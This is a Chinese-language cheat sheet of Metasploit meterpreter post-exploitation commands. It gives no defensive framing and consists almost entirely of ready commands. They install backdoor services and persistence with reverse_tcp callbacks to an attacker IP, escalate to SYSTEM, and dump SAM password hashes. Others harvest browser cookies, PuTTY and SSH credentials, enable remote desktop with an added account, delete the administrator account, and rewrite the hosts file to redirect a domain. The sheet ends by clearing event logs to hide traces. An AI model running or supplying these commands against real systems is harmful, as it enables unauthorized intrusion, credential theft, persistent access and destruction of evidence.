msf 常用渗透模块—-POST

创建服务作为后门

meterpreter > run metsvc

查看目标主机的内网IP段情况

meterpreter > run get_local_subnets

添加路由表和对应的session

route add 192.168.1.0 255.255.255.0 1

查看路由表

route print

读取目标主机IE浏览器cookies等缓存信息,嗅探目标主机登录过的各类账号密码

meterpreter > run post/windows/gather/enum_ie

获取目标主机上最近访问过的文档、链接信息

meterpreter > run post/windows/gather/dumplinks

在获得system权限的情况下,使用hashdump命令可以到处目标主机的SAM文件,获取目标主机的账号密码hash信息,剩下的可以用爆破软件算出明文密码

meterpreter > hashdump

使用getsystem提升当前进城执行账户微system用户,拿到系统最高权限

meterpreter > getsystem

开启目标主机远程桌面

meterpreter > run getgui -e

开启目标主机的远程桌面服务后,可以添加账号以便利用

meterpreter > run getgui -u example_username -p example_password

收集目标tomcat信息

meterpreter > run post/windows/gather/enum_tomcat

枚举电脑保存的putty 主机信息、putty的session

meterpreter > run post/windows/gather/enum_putty_saved_sessions

通过arp方式内网扫描ip

meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

目标主机上的身份认证信息

meterpreter > run post/windows/gather/credentials/credential_collector

目标主机安装了哪些软件

meterpreter >  run post/windows/gather/enum_applications

目标主机当前在线的用户

meterpreter >  run post/windows/gather/enum_logged_on_users

目标主机存在哪些本地提权漏洞

meterpreter >  run post/multi/recon/local_exploit_suggester

删除目标主机的administrator账号

meterpreter > run post/windows/manage/delete_user USERNAME=administrator

目标主机环境变量信息

meterpreter > run post/multi/gather/env

目标主机保存的ssh身份验证信息

meterpreter > run post/multi/gather/ssh_creds

修改目标主机的host文件

meterpreter > run post/windows/manage/inject_host ip=xxx.xxx.xxx.xxx domain=www.baidu.com

向目标主机写入后门 例如:run persistence -X 开机启动 -i 每隔多少秒执行一次 -r xxx.xxx.xxx.xxx -p msf监听的端口

meterpreter > run persistence

关于 persistence(持久后门) 参数说明

-A 自动生成一个回连的meterpreter,默认地址4444
-L <opt>如果不设置,默认写入payload 到目标的%TEMP%目录
-P <opt>默认使用 windows/meterpreter/reverse_tcp,如果其他平台需要设置这个值
-S 在目标启动时,作为服务启动。必须要有root或者system权限
-T <opt>备用的第二个后门,一般是执行时就带上 -T local-path/.exe
-U 用户登录时,自动回连
-X 开机自动回连
-h This help menu
-i <opt>回连间隔 单位,次/秒
-p <opt>msf监听的端口
-r <opt>运行msf的ip

最后擦屁股:清理痕迹

clearev